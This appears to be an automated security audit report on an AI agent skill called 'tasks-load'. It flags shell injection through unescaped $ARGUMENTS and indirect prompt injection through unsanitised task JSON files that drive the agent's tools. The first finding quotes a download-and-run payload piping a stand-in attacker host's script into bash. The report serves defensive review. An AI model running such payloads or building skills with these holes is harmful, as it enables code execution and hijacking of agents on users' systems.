tasks-load
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill performs direct shell interpolation of the
$ARGUMENTSvariable in several steps (Step 1, 2, and 3). Commands likefind projects/$ARGUMENTS/tasksandecho "$ARGUMENTS" > .claude-active-projectare susceptible to shell injection. An attacker providing a payload like; curl attacker.com/exploit | bash ;as a project name could achieve arbitrary code execution. - [PROMPT_INJECTION] (HIGH): This skill is vulnerable to Indirect Prompt Injection. It ingests data from task JSON files located in the project directory and uses that data (subject, description, activeForm) to drive the
TaskCreatetool. 1. Ingestion points: Files matchingprojects/$ARGUMENTS/tasks/**/*.json. 2. Boundary markers: Absent; the agent is instructed to read the raw JSON and use its fields. 3. Capability inventory:Bash,Read,TaskCreate,TaskUpdate,TaskList. 4. Sanitization: None; the skill does not specify any validation or escaping of the task content before processing it, allowing malicious task files to potentially hijack the agent's behavior.
Recommendations
- AI detected serious security threats
Audit Metadata